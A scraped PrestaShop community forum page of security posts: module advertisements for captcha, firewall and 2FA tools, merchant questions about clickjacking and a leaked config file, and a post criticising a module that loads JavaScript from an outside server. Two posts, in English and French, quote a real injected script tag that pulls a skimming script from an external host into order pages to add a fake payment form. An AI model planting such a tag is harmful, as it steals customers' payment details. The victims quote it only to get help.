Search the Community

Anti-Spam, Anti-Bot, Anti-Brute-Force, Block Unwanted Bot and Spammer Traffic The module allows you to protect registration and login forms from bots. Limit the number of login and registration attempts. Module protect and limits the use of contact form, newsletter registration form and modules 'productcomments', 'iqitreviews'. Also, the module detects and ban more than 90% of the simplest bots. It is possible to manually block an IP and Email addresses, as well as exclude blocking. The module keeps a log of connection attempts and a log of entered data. After install, module creates 2 tabs in BO Customers tab. SS Triggers - phrases and words for contact form and 'productcomments', 'iqitreviews' modules (empty table after install and create own list). SS Actions - attempts log table with controls (view, edit, delete). Developed for 8.X but may work with 1.7.8+ (Reported: works on 1.7.8.3) The module will NOT work with versions below 1.7.8.3, perhaps in the future... Download simplesecurity.zip (Always latest version.) ~=DONATIONS ARE WELCOME=~ About updates please read this topic.

Boost your PrestaShop's security with 'PrestaSecure': Advanced password rules, mass reset and change reminders, password creation and productivity tooltips. Improve password strength, customize requirements, enhance security for all users, increase customer confidence, enable account activation, easily reset passwords, and strengthen cyber security with 'PrestaSecure'. Demo: Front Office: https://test11.megventure.com/en/index.php?controller=registration Backoffice: https://test11.megventure.com/ Username: [email protected] Password: demodemo Product link: https://www.megventure.com/en/prestashop-modules/45-empower-password-8691246220325.html Features: Enhanced Security: Bolster your platform's safety with sophisticated password rules, protecting your customer's sensitive information and reducing potential security risks. Mass Password Reset: In the face of a security breach or routinely for enhanced security, quickly reset all customer passwords with a single click. Automated Reminder Emails: Send automated notification emails urging customers to change their passwords, maintaining account security over time. Flexible Password Requirements: Set customized password strength requirements. Choose from various complexity levels, including minimum length, the requirement for special characters, numbers, and upper and lower-case letters. Mask/unmask Password Displays: Set a typical eye icon to the password fields to mask / unmask passwords while typing. User-Friendly Interface: An intuitive design allows your customers to gauge password strength dynamically as they type, encouraging the use of stronger passwords. Compatibility: Integrates seamlessly with your existing PrestaShop setup, ensuring smooth performance across different versions of the platform. Multilingual Support: Equipped with multi-language support to cater to a global customer base. Comprehensive Documentation: Detailed instructions and support materials included for an effortless integration process.

Hello, I am delighted to present our latest module : Op’art Secure Admin Link. The goal of this module is to solve a security problem when you have to share access to the backoffice of your store while simplifying your life. The module is available here: https://addons.prestashop.com/en/website-security-access/95150-op-art-secure-admin-link-temporary-back-office-access.html You also have a presentation video here (in french): By default on PrestaShop, creating access to the backoffice is laborious. You have to : Add a last name, first name and email. Create a complicated password. Copy the backoffice URL, login and password. Sent all of this to the person who should log in to your site admin. And very often the password does not work the first time and you have to start again. Not only is it annoying, but also and ESPECIALLY it leads to behavior that puts your store in DANGER. As creating access is laborious, many merchants tend to use a single access that they share with the different people who need to access their backoffice. Or, they create different accesses, but forget to delete them, which is quite understandable, because you have enough to manage not to have to think about deleting the accesses after a service provider has worked on your store. All these accounts that accumulate and remain active for too long are entry points for hackers and malicious people. We therefore decided to solve this problem while simplifying your life. With Op’art Secure Admin Link, you will be able to create a secure connection link to the back office in 30 seconds. It is no longer necessary to create a password and do multiple copy and paste tasks. You create the link in 2 clicks, you copy it in 1 click and you send it to the person who must connect to your backoffice. And that’s it! The link will automatically deactivate after a few days, making it unusable. If you wish, you also have various options at your disposal to further improve the security of your links: IPs restrictions Choice of link deactivation date Connection tracking. Choice of authorization profile. In short, this module will clearly save you time while improving the security of your store! Of course, don't hesitate to ask all your questions about this module.

Hello PrestaShop Community, I want to bring to your attention a significant security risk associated with loading external JavaScript files in PrestaShop module https://addons.prestashop.com/en/fast-mass-updates/19965-bulk-mass-editing-products.html. Recently, I encountered a script in one of the modules that loads JavaScript from an external source, and I believe it's crucial to share the potential dangers and preventive measures with all of you. The Issue Here is the snippet of code: /masseditproduct/controllers/admin/AdminMassEditProductController.php $this->context->controller->addJS(array( $this->module->getPathUri() . 'views/js/jquery.insertAtCaret.js', $this->module->getPathUri() . 'views/js/redactor/redactor.js', // ... 'https://seosaps.com/ru/module/seosamanager/manager?ajax=1&action=script&iso_code=' . Context::getContext()->language->iso_code )); This code dynamically loads a JavaScript file from an external URL, incorporating the current language’s ISO code. https://seosaps.com/ru/module/seosamanager/manager?ajax=1&action=script&iso_code=en /** * 2007-2016 PrestaShop * * NOTICE OF LICENSE * * This source file is subject to the Academic Free License (AFL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to [email protected] so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to http://www.prestashop.com for more information. * * @author Goryachev Dmitry * @copyright 2007-2016 Goryachev Dmitry * @license http://opensource.org/licenses/afl-3.0.php Academic Free License (AFL 3.0) * International Registered Trademark & Property of PrestaShop SA */ setTimeout( function () { $(function () { if (typeof $.fn.live == "undefined") { $.fn.live = $.fn.on; } if (typeof $.fn.setCenterPosAbsBlockSeoSa == "undefined") $.fn.setCenterPosAbsBlockSeoSa = function () { var offsetElemTop = 20; var scrollTop = $(document).scrollTop(); var elemWidth = $(this).width(); var windowWidth = $(window).width(); $(this).css({ top: $(this).height() > $(window).height() ? scrollTop + offsetElemTop : scrollTop + ($(window).height() - $(this).height()) / 2, left: (windowWidth - elemWidth) / 2 }); }; var seosa_manager_path = "https://seosaps.com/ru/module/seosamanager/manager"; var seosa_manager_css = "https://seosaps.com/ru/module/seosamanager/manager?ajax=1&action=css&time=1720592363"; var seosa_lang = "en"; $.post(seosa_manager_css, {}, function (r) { $("head").append(""); }); $("#seosa_manager_btn").live("click", function (e) { e.preventDefault(); $.ajax({ url: seosa_manager_path, type: "POST", data: { ajax: true, action: "manager", iso_code: seosa_lang }, success: function (r) { var body = $("body"); body.append(""); body.append(""); $("#seosa_manager_stage, #seosa_manager_form").fadeIn(300); $("#seosa_manager_form").setCenterPosAbsBlockSeoSa(); }, }); }); $("body").delegate("#seosa_manager_stage, .seosa_manager_close_form", "click", function (e) { e.preventDefault(); $("#seosa_manager_stage, #seosa_manager_form").remove(); }); }); }, 1 ); Why This is a Security Risk Cross-Site Scripting (XSS): An attacker could modify the external JavaScript file to inject malicious code, which can then execute within the context of the user’s browser. This could lead to stolen cookies, intercepted form data, and other malicious activities. Cross-Site Request Forgery (CSRF): The script could be altered to perform unauthorized actions on behalf of the logged-in user, exploiting their session. Data Theft: The modified script could send sensitive user data to an attacker’s server. Phishing: Attackers could modify the script to change the appearance of the website, inserting fake login forms or other elements to steal user credentials. Why doesn't prestashop check the code before publishing it to people? All modules should host scripts locally in modules, not externally.

Hi, for security purposes I would like to be alerted when core file changes. The compare functionality is in the settings and autoupgrade module, but I would like it run automatically nightly and be notified when there is a change. Do you know of any module or some other way how to achieve this? Note: I'm able to access limited shell on shared hosting, but not able to run shell scripts or use pipes. I can run php scripts scheduled in cron.

Hello to all, I introduce myself as a member of the Friend of Presta association and I think many people on this forum already know me. Since a few months the FoP association has created a security cell that analyses the PrestaShop ecosystem. We have identified hundreds of modules with security holes. You can already find the list of modules for which we have already created CVEs by respecting a timeline for the authors of these modules. You can subscribe to the rss feed here this list is updated every Tuesday and Thursday. I will try to add on this post all the new vulnerabilities we publish.

Age Verification Popup Module The Age Verification module allows the store admin to display Age Confirmation Popup on the storefront and user will be able to access the store only after confirming the age. The Age Verification Module allows the store admin to display an attractive popup on the storefront. Admin can customize the look and feel of the popup in simple steps. More Info and purchase here: Age Verification Popup Module FRONT DEMO BACK OFFICE DEMO Features of the Age Verification Popup Module: 1) Enable/disable: The store admin can easily enable or disable the module. 2) Verification Age: As per the legal requirements the store admin can set the age limit for the popup. 3) Display D.O.B: If this field is enabled then the user needs to enter his/her D.O.B to access the store products. If the age will be more than the defined Verification Age only then the user will be able to access the store. 4) Display Note: Admin can display a short note on the popup to inform the user regarding the age verification or adult content. 5) Enter Small Note: The store admin can define the text in this field. 6) Redirect URL: In case the user is not interested to access the store then the user can exit the store by clicking the Exit button available in the popup. The store admin can set the redirect URL for the Exit button. 7) Display Image: In order to promote the brand/store or make the popup attractive admin can also upload the image. 8) Display Terms and Conditions: The store admin can add a checkbox to confirm the age with a link to the Terms and Conditions page. 9) Look and Feel Settings: Admin can customize the look and feel of the popup. Module link: https://addons.prestashop.com/en/website-security-access/25767-knowband-age-verification-popup-18-verification.html

Hi, This module will allow you to easily and intuitively manage the access to your site according to the country of origin of your visitors. You can simply prohibit access to your site to certain countries, either for security reasons or because you are not allowed to sell in that country. It will also allow you to define global or customized redirects. For example, if you have official distributors by country, you will be able to automatically redirect a visitor to your site from another country to the site of your distributor partner in that country. If you don't define a redirection, the visitor coming from a forbidden country will see a maintenance page informing him of the non-distribution of your products for his country so that he is not suddenly told that his country is forbidden. Online demonstrations: https://medcountryaccess.carrd.co/ Download the module on : PrestaToolBox: https://www.prestatoolbox.com/security/142-allow-or-deny-access-by-countries.html PrestaShop Addons: https://addons.prestashop.com/en/website-security-access/2698-allow-or-deny-access-by-countries.html

Hello, Here is my last module of the year 2022 which will become an essential for you during the year 2023. It will allow you to automatically and regularly backup your PrestaShop store database using a cron task. You can schedule the reception of the archive thus created directly by email. Of course, a small passage of my previous module allowing to clean your database just before will avoid saving useless data and consuming space. For once, I do not propose a demonstration of this module since it is only accessible to employees with a SuperAdmin profile, all this in the principle of a reinforced and essential security. Download: Prestatoolbox: https://www.prestatoolbox.com/security/464-database-backup-module-for-prestashop-a-simple-and-efficient-solution.html Addons: https://addons.prestashop.com/en/data-migration-backup/90418-fast-and-optimized-database-backup.html Photos:

So far I have been quite impressed by out of the box features provided by Prestashop but this thing really let me down: If someone wants to register on the site or do a guest check out he can put anything as his name. Anything includes things like "---", all spaces, "***" etc. There is no validation provided here and this is really annoying. I have tried to modify the processSubmitAccount method in website\controllers\front\AuthController.php to use the Validate::isName() method but this does not help at all. It lets the users put all the strange character in the name field. I tried to create another method inside the Validate class: public static function isHumanName($name) { return preg_match('/^[A-Za-z]+$/', $name); } but for some reason this simple pattern does not work. All I want to be able to do is allow names like "FirstName MiddleName" having only one space chracter at a time and not at the start of the name. My php and regex skills are minimal and this is all I have come up with so far. Besides name I want to validate addresses and phone numbers. Addresses can have numbers in addition to letters while phone numbers can only have numbers. I guess if the problem with validating names is solved then I would be able to do it for address and numbers as well. I would appreciate if someone can put me in right direction. Thanks

Hi All, Greetings of the day. This prestashop addon helps the administrator to log visitors’ IPs, city, country, zip, longitude, latitude, and others in the database and Graphical representation of visitors' data using charts from the back office. This will help to get detail about each visitor. This data helps to make business decisions, and know SEO and marketing campaign output. This module helps to get visitors' information inside the store back-office instead of visiting online analytics and statistics websites like google analytics, StatCounter, etc. The loading time of script from analytics websites takes time on the home page and good speed on the home page is important for SEO. This module helps to overcome this issue. The main goal of any visitor management system is to properly and effectively process and track guests. Features: - Visitors' management facilitates security via details information about each visitor. - Graphical representation of visitors' data using charts helps to know visitors from around the world with maps and good visualization - Graphical Statistics Chart about Visitors By Country in Percentage using Pie Chart - Graphical Statistics Chart about Visitors By Month using Column Chart - Graphical Statistics Chart about Visitors By Day using Column Chart - The electronic or written record of every guest who has visited your site. - Designed to improve security by providing a digital record of who visits on-site. - Support multiple browsers and operating systems. - Helps to find targeted audience visits and conversions in sales. - Help in analysis, statistics, SEO, and marketing campaigns. - Alternate option instead of using analytics script from Google Analytics and Statcounter. - SEO friendly. - Support all browsers: Firefox, Chrome, IE, Safari, etc. - Lightweight. (Smaller file size which loads faster.) - Compatible with PrestaShop 1.5.x,1.6.x,1.7.x and 8.0. - Multiple browser compatibility(IE, Firefox, Opera, Safari, Chrome, and Edge). - Mobile, Tablet, and all devices compatible. - Multi-language and Multi Store compatible. - 24*7 Support - Good Documentation Installation : Step 1: Upload the module zip file from the back-office Module & Services menu tab. Module Manager area using the upload button. After the successful installation module menu, the link will appear in the left menu or top menu in the back-office more area. Step 2: Install the module using the install button. Step 3: Visit the module management page from the back-office "More" area (section) in the left menu in the back-office. Step 4: The module installation process is very easy, how module configuration works can be seen in the demo instance. Step 5: Please visit our demo instance for module configuration and usage demo. - Module works without making any change in the existing PrestaShop file so that existing customization and theme change do not affect. - We provide free technical and feature support in installation, and configuration, as well as access to updates available for this product. - Free support on installation, configuration, and customization as per store requirements, for example, new hook addition to your store. For a demo on version 1.7.x visit the below links Front-office Demo URL => https://www.hrms-systems.com/presta-addons/en/ Back-office Demo URL => https://www.hrms-systems.com/presta-addons/admin619j6kpbb/index.php For a demo on version 1.6.x visit below links Front-office Demo URL => https://www.hrms-systems.com/presta-apps/en/ Back-office Demo URL => https://www.hrms-systems.com/presta-apps/admin539fyipwq/index.php OUR PRESTASHOP ADDONS MARKETPLACE URL PrestaShop Marketplace URL => https://addons.prestashop.com/en/2_community-developer?contributor=301729 Alternate module download URL => https://www.presta-addons-modules.com

Hello In the code source of the order pages of my Prestashop 1.6 website, I found a script tag who is calling a malicious script <script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script> <!DOCTYPE HTML> <!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="fr-fr"><![endif]--> <!--[if IE 7]><html class="no-js lt-ie9 lt-ie8 ie7" lang="fr-fr"><![endif]--> <!--[if IE 8]><html class="no-js lt-ie9 ie8" lang="fr-fr"><![endif]--> <!--[if gt IE 8]><html class="no-js ie9" lang="fr-fr"><![endif]--> <html lang="fr-fr"><head><meta charset="utf-8" /><title>Comman ...... This script changes the DOM and add an undesirable payment form after the PAYEMENT HOOK (I hid this form with CSS to prevent my customer to see it and use it. Is anyone having this same issue ? The problem seems pretty complex after 2 days of investigation, searching through all my files and all my DB without finding something interesting.

Buy it here: https://addons.prestashop.com/en/website-security-access/44413-security-pro.html Price: Only 69,99 EURO (Free support included) Cheap doesn't always mean bad. I spent more than a year on this project and I want to help as many store owners as possible. You get all the security features that you need in this module and I update the module on a regular basis. PrestaShop in its own is very secure. It's among the most secure content management systems available. When that is said, PrestaShop advice you to set file- and folder permissions by your own, and secure your back-end with another layer of security from your webserver itself. This part is not covered by PrestaShop. I added those functions to the module, so you can do it without any coding knowledge. I added all the functions that you need to follow best practice. Trust me - this module will save you months of work. I did not add settings that are obviously already covered by PrestaShop core with another technique, but if some technique having more layers is good practice, I added those extra layers of security. You can for instance enable Two-Factor Authentication and setup e-mail alert in case of brute force attacks. Example of a great feature: You can enable e-mail notifications for filechanges. You choose the time interval to check for, by a cronjob. Then you will get an e-mail if there were any filechanges since last check. In case you get malware, spyware etc., or you mess something up by yourself, you will get an e-mail with paths to the files that was changed. In that way you know exactly where to check! Here are what you get with Security Pro (all the configurations are not listed, check screenshots for additional information): Brute force protection: Enable/Disable "Brute force protection for back office" Enable/Disable "E-mail notification in case of fail attempts to login" Enable/Disable "E-mail notification in case of successfully login" Enable/Disable "Log" Two-factor authentication Enable/Disable "Two-factor authentication" (for back office) Second login Enable/Disable "Second login" (from your webserver itself) Secure front office Enable/Disable "Click-jack protection" Enable/Disable "XSS protection" Enable/Disable "Disable content sniffing" Enable/Disable "Force secure connection with HSTS" Enable/Disable "Expect CT" Enable/Disable "Referrer policy" Anti-SPAM Enable/Disable "Prevent fake accounts / Block bots" Enable/Disable "Contact form" Enable/Disable "Block TOR IPv4 and IPv6 addresses" Enable/Disable "Block custom list of IP addresses" (The module can handle IPv4, IPv6 addresses, as well as IP ranges, in CIDR formats like ::1/128 or 127.0.0.1/32 and in pattern format like ::*:* or 127.0.*.*) Enable/Disable "Block custom list of user agents" Anti-virus Enable/Disable "Malware scanner" Enable/Disable "filechanges scanner" Enable/Disable "Log" Enable/Disable "Block file uploads" (for back office) Firewall (WAF) Enable/Disable "Anti-flood / Anti DDoS protection" Enable/Disable "Bot check" Enable/Disable "Anti-SQL injection" Enable/Disable "Anti-XXS injection" Enable/Disable "Anti-SHELL injection" Enable/Disable "Anti-HTML injection" Enable/Disable "Anti-XST injection" Enable/Disable "Block too long HTTP requests" Enable/Disable "Block user agents with too long names" Enable/Disable "Block old HTTP protocols" Enable/Disable "Block file-upload" (front office) Enable/Disable "Log" Protect content Enable/Disable "Disable right click" Enable/Disable "Disable right click on images only" Enable/Disable "Disable drag and drop" Enable/Disable "Disable copy" Enable/Disable "Disable cut" Enable/Disable "Disable paste" Enable/Disable "Disable text selection" Automatic backups Enable/Disable "Backup database to local" Enable/Disable "Backup database to Dropbox" Enable/Disable "Backup files to local" Enable/Disable "Backup files to Dropbox" Admin directory Change name of admin directory in a few clicks. Password generator Strong password generator for MySQL database, FTP, hosting panel/cPanel, SSH access and back office. Scripts Fix insecure permissions vulnerability Fix directory traversal vulnerability Analyze system for all known vulnerabilities CVE-2020-5293 CVE-2020-5288 CVE-2020-5287 CVE-2020-5286 CVE-2020-5285 CVE-2020-5279 CVE-2020-5278 CVE-2020-5276 CVE-2020-5272 CVE-2020-5271 CVE-2020-5270 CVE-2020-5269 CVE-2020-5265 CVE-2020-5264 CVE-2020-5250 CVE-2019-13461 CVE-2019-11876 CVE-2018-8823 CVE-2018-8824 CVE-2018-7491 CVE-2018-19355 CVE-2018-19124 CVE-2018-19125 CVE-2018-19126 CVE-2018-13784 CVE-2017-9841 CVE-2015-1175 Analyze your server for insecure settings session.use_cookies session.use_only_cookies session.cookie_httponly session.hash_function session.use_trans_sid session.cookie_secure session.use_strict_mode session.cookie_lifetime session.lazy_write session.sid_length session.gc_divisor session.sid_bits_per_character allow_url_fopen allow_url_include display_errors log_errors error_reporting display_startup_errors expose_php register_globals register_argc_argv short_open_tag xdebug.default_enable xdebug.remote_enable file_uploads upload_max_filesize post_max_size max_input_vars max_input_time memory_limit max_execution_time default_charset Analyze you PrestaShop configuration for insecure settings PHP version (7.2.19) SSL enabled SSL Enabled everywhere PrestaShop token Mod Security PrestaShop admin directory name Database table prefix PrestaShop debug mode Analyze SSL Analyze your SSL certificate Scan your website for mixed content Recommandation The module does not use overrides and none of the core-files are modified, so you are completely safe against conflicts between other modules. Works on all major server software (Apache, Nginx, LiteSpeed, etc.). Works on PrestaShop 1.6.1.x, 1.7.x.x and on thirty bees 1.x.x. Works on PHP 5.6.x, 7.0.x, 7.1.x and 7.2.x. Everything is very well tested. No known bugs exist and the module is battle tested! The module is already in production on many stores. The code quality is high and it follows PretaShop's guidelines. The code is optimized for performance and security. If you want to see a demo of the module, or if you have questions please contact me. Contact link: https://addons.prestashop.com/en/contact-us?id_product=44413

I added the <meta http-equiv="X-Frame-Options" content="deny"> in header.tpl file ,but it not working and throws the error. And I also added the Header always append X-Frame-Options SAMEORIGIN line in .htaccess file. But this is also not working. Then how can I prevent Clickjacking on my Website?

What's TOR and IP Blocker? Our module is a complete security suite for PrestaShop 1.5.X - 1.7.X including active blocking rules for TOR network, IP's, CIDR ranges, proxies, bots, hosts, bad user agents, SQLi, XSS and more. Secure your business with the definitive all-in-one firewall solution for PrestaShop. What features are included? Without overrides and compatible with all webservers (Apache, nginx, lightweight, etc) Auto update for TOR nodes, proxies and abuse IP's ProjectHoneypot API integration No suscription required for any of the services Block all traffic comming from TOR network Block all traffic comming from anonymous proxies Block all traffic comming from abuse IP's Block all traffic comming from blacklisted IP's Block all traffic comming from bad user agents Block entire IP ranges (CIDR) Block by hostname GeoIP blocking (Country blocking) XSS and SQLi detection and blocking Administrator email notification on attacks or Backoffice logins Whitelist / Blacklist desired IP's Network Tools (host /IP conversion, ping, ProjectHoneypot report) PrestaShop Core Integrity checker Malware scanner Cache system for a better performance and less database queries Complete stats Some customers reviews "After lots of spam orders, we were tired to canceled theses orders, sometimes more than 20 per days all paid by freshly stolen credit card This module save lots of time by blocking these annoying spammers. Plus, technical support are really helpful !! Thanks a lot for this module, I was really looking after this kind of blocker". Guy G. "Good module to regain performance and block nosy competitors. Easy to install & configure". Oliver S. "After updating the plugin works even more efficiently. I recommended this plugin, it's better than blocking by htaccess and easier than configure hosting". Kamil P. https://www.youtube.com/embed/NX4LEAhhJPs Product Link https://addons.prestashop.com/en/website-security-access/26644-tor-and-ip-blocker.html

Module Vérification d’Âge (Age Verification) Le module de vérification de l’âge permet à l’administrateur de la boutique d’afficher la fenêtre de confirmation de l’âge sur la vitrine et l’utilisateur ne pourra accéder à la boutique qu’après confirmation de l’âge. Le module de vérification de l'âge permet à l'administrateur du magasin d'afficher une fenêtre contextuelle attrayante dans la vitrine. L'administrateur peut personnaliser l'apparence de la fenêtre contextuelle en quelques étapes simples. Plus d'infos et acheter ici: Module Vérification d’Âge (Age Verification) Démo Boutique Démo Back office Caractéristiques du module contextuel de vérification de l'âge: 1) Activer / désactiver: l’administrateur du magasin peut facilement activer ou désactiver le module. 2) Âge de vérification: conformément aux exigences légales, l’administrateur du magasin peut définir l’âge limite pour le popup. 3) Affichage D.O.B: Si ce champ est activé, l’utilisateur doit saisir son D.O.B pour accéder aux produits du magasin. Si l'âge est supérieur à l'âge de vérification défini, l'utilisateur pourra accéder au magasin. 4) Afficher la note: l'administrateur peut afficher une courte note dans la fenêtre contextuelle pour informer l'utilisateur de la vérification de l'âge ou du contenu pour adultes. 5) Entrez Petite Remarque: L'administrateur du magasin peut définir le texte dans ce champ. 6) URL de redirection: si l'utilisateur n'est pas intéressé à accéder au magasin, il peut quitter le magasin en cliquant sur le bouton Quitter disponible dans la fenêtre contextuelle. L'administrateur du magasin peut définir l'URL de redirection du bouton Quitter. 7) Image d’affichage: Afin de promouvoir la marque / le magasin ou de rendre la popup attrayante, l’administrateur peut également télécharger l’image. 8) Afficher les conditions générales: L'administrateur du magasin peut ajouter une case à cocher pour confirmer l'âge avec un lien vers la page Conditions générales. 9) Paramètres d'affichage: l'administrateur peut personnaliser l'apparence de la fenêtre contextuelle. Module link: https://addons.prestashop.com/fr/securite-access/25767-knowband-verification-dage-age-verification.html

Bonjour Dans le code de mes pages de commande, avant toute la structure classique de la page , se trouve une balise script qui appelle un script malveillant. <script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script> <!DOCTYPE HTML> <!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="fr-fr"><![endif]--> <!--[if IE 7]><html class="no-js lt-ie9 lt-ie8 ie7" lang="fr-fr"><![endif]--> <!--[if IE 8]><html class="no-js lt-ie9 ie8" lang="fr-fr"><![endif]--> <!--[if gt IE 8]><html class="no-js ie9" lang="fr-fr"><![endif]--> <html lang="fr-fr"><head><meta charset="utf-8" /><title>Comman ...... Celui-ci ré-arrange le DOM pour s'incruster dedans et rajouter un petit formulaire dans la partie paiement (j'ai désactivé celui-ci) Est-ce que quelqu'un a rencontré ce problème ? Le problème m'a l'air assez complexe après 2 jours à retourner fichiers et BDD sans rien trouver de significatif. Edit : Je suis sous Prestashop 1.6 Merci d'avance

Bonjour à tous, Je travaille sur PS 1.7.3.1 et je rencontre depuis hier un problème lorsque je souhaite modifier une commande dans l'admin en rajoutant un produit. Une fenêtre apparait en indiquant : Impossible to add the product to the cart. textStatus: 'parsererror' errorThrown: 'SyntaxError: Unexpected token < in JSON at position 0' responseText: Clé de sécurité invalide J'ai désactivé les modules, vidé les caches manuellement, supprimé mes cookies, je me suis reconnectée au BO, aussi supprimé le .htaccess, et maintenant je sèche quelque peu.. La console m'indique que l'appel AJAX passe par la fonction addProductOnOrder du controller AdminOrders, mais je ne sais pas ou se situe le problème. Peut être avez-vous des pistes ? Cordialement

[MODULE] Google reCAPTCHA Security Captcha Spam Protection Module Overview Google reCAPTCHA is a free service that protects your site from spam and abuse.Using this service can make your website more secure, away from robot attacks, brute force cracking, simulated submission, remote registration, spam, etc. What this module does for you event_available Improve your website security Simple and easy to install. Stable and powerful after-sales service. Support customized reCAPTCHA Theme and Size. Provide 7 reCAPTCHA verification forms:Frontend register, Frontend login, Frontend forget password, Backend login, Backend forget password, Contact form, Newsletter subscription Software quality is officially certified by PrestaShop(https://validator.prestashop.com/). What your customers will like Customers’ accounts and passwords on the website get maximum security protection Other Please visit developer's modules page for other amazing modules: https://addons.prestashop.com/en/2_community-developer?contributor=1197421 Please leave your feedback and rating after using the module. It helps us to make better modules and provide better service to you and others: http://addons.prestashop.com/en/ratings.php Have any ideas how we can improve this module? Just contact us, and we will implement new features in the upcoming releases. Features Support customized reCAPTCHA Theme and Size. Automatic and intelligent detection of client language Support Frontend register reCAPTCHA verification forms Support Frontend login reCAPTCHA verification forms Support Frontend forget password reCAPTCHA verification forms Support Backend login reCAPTCHA verification forms Support Backend forget password reCAPTCHA verification forms Support Contact form reCAPTCHA verification forms Support Newsletter subscription reCAPTCHA verification forms Support Product comments reCAPTCHA verification forms Support multiple stores Support multiple languages What's New in Version 1.0.0(10/14/2020) Upload the module for the first time. Support and updates You automatically get 3 months of support for this product. For 90 days after your purchase, you can enjoy technical and feature support, as well as access to updates available for this product. [MODULE] Google reCAPTCHA Security Captcha Spam Protection Module

Bonjours à tous, je suis nouveau sur le forum J'ais un problème dans mon Back office de prestashop version 1.7.5.2 Lorsque que j’ai activé le SSL dans le back office j’ai un message qui m’est apparu, que j’ai mis en pièce jointe. Pour plus de renseignement voici : Hébergeur : OVH Multisite / PHP globale 7.2 mais je peux revenir à une configuration précédente. Que dois-je faire ? Amicalement. Bruno

Hello, i'm running an installation of Prestashop 1.6.1.24 and because of a misconfigured webserver, the file config/settings.inc.php has been downloaded at least once from an unknown person. Immediately after recognizing this, I changed the password of the database (which can only be accessed via localhost). But now i'm a bit concerned about the other impacts that this could have, perhaps someone can give me a few hints. Should i take further measures? What could an attacker possibly do with access to the data in this file (things like COOKIE_KEY, COOKIE_IV, RIJNDAEL_KEY or RIJNDAEL_IV) ?

Hello! I received the following message that contains a threat to my site and although there is no indication of any real attack I would like help to understand if there are reasons to worry. My online store is new so my database is small, but I am concerned with the reputation and the issue of search engine indexing. Every help is welcome. Best regards!

Hi, I recently launched my website. During the day, quite a few times, I get a burst of user ips repeating. Sometimes they have numbers (192.xx) or (48.xx) or any other country ip (full length of course, this is just an example) but a lot of IPs come from 0.0.0.0. And all of these ips repeat multiple times every few seconds making visitor counts go as high as 300. I know the ones starting with 66.xx are from google, but are the rest bots as well? It's quite strange as I have only received 1 order till now but have had over 5000 visitors. I have SSL and Cloudflare and I just Installed this:

Ultimate Math CAPTCHA / Enhanced Anti Spam Security Math and Image CAPTCHA is the best security solution that protects your Store from spam entries. An effective, easy to manage module that seamlessly integrates into contact, login, registration, password recovery, comments and newsletter forms. CAPTCHA for PrestaShop is a reliable anti-spam module that protects your Shop from spam, random unwanted users, and bots entries by means of Math Logical and Text Images. Advantages: Secure your forms against spam Stop annoying emails from spam bots via your contact form and stops bots from creating fake accounts in your system. Spend more time marketing to real people, not deleting bots. Easy one-click installation The installation is according to PrestaShop default behavior. This easy process is also detailed in our documentation. Customisable appearance With a fully customisable design, Math and Image CAPTCHA will fit the design of your site. Multi-Language support This module is compatible with multi-language PrestaShop. Our module allows you to change the text for each language you want to have it in your website. Multi-Store support This module is compatible with multi-store PrestaShop. You can install the module in all your stores in a multi-store and use different configurations for each of them or configure once for all stores. User-friendly interface Our module is simple to install, easy to update, intuitive, efficient, pleasant - easy to navigate GUI and easy to remove. Ensure the security of your Shop and prevent bots from overrunning sites with spam, fraudulent registrations, fake sweepstakes entries, and other nefarious things. Image CAPTCHA is a type of challenge-response test used to ensure that the request is not generated by a computer (e.g. spam bot). Math CAPTCHA is the same, but instead of typing code from a generated image, it requires providing an answer to a simple math challenge. We carefully integrated in this module the most important features of CAPTCHA as follows: Customisable enable zone (Contact form, Front-end login form, Registration form, Reset password form, Comments form and Newsletter form) Option to show CAPTCHA after fail customer login attempts CAPTCHA type customisation (Math Logical and Text Images) Set up arithmetic actions (Addition (+), Substaction (-), Multiplication (*)) on Math Logical CAPTCHA Set up complexity level on Math Logical CAPTCHA Option to choose from a pack of number images to make CAPTCHA more complex Supports multi-language Incredibly simple settings for fast setup without modifying code Option to fully customise the Image CAPTCHA (Character count, Complexity, Text case, Width, Height and Background color) Edit the Whitelist message with multi-language support Hide CAPTCHA for the whitelisted IP addresses Detailed step-by-step documentation Multi-shop supports Module already translated in English, German, Spanish, Japanese, Italian, French, Russian, Dutch, Korean, Bulgarian, Finlandian, Hungarian, Lithuanian, Polish, Portuguese, Turkish and Romanian Responsive design (format valid for all kinds of mobile devices) Our module is designed to protect customers sensitive information which will improve your website's safety and user experience. The installation is according to PrestaShop default behavior. Very easy to install and setup. Also we provide free support to install and configure. For PrestaShop version 1.5.x Log-in into your Back-office Click "Modules" from top menu Click on "Add a new module" Click "Choose a file" Browse for your module .zip Click on "Upload this module" Search for the uploaded module and click "Install" For PrestaShop version 1.6.x Log-in into your Back-office Click "Modules & Services" from left menu Click on "Add a new module" Click "Choose a file" Browse for your module .zip Click on "Upload this module" Search for the uploaded module and click "Install" For PrestaShop version 1.7.x Log-in into your Back-office Click "Modules & Services" from left menu Click on "Upload a module" Browse for your module .zip Upload and install For any problems encountered in installation and configuration process we will offer you fast and quality support.

Dzień dobry Mam problem otóż od jakiegoś miesiąca na mojej preście w wersji 1.7.6.3 przy wybieraniu opcji zaawansowane>importuj lub jakiejkolwiek innej wyświetla mi się wiadomość "niewłaściwy token: Bezpośredni dostęp do tego linku może spowodować luki w bezpieczeństwie sklepu.". Dodatkowo przy skanowaniu przy użyciu OWASP wyświetlają mi się błędy o lukach w zabezpieczeniach. Nie wiem czy to się jakoś łączy ale czy ktoś wie jak rozwiązać te problemy? W załącznikach przesyłam screeny z presty i skanowania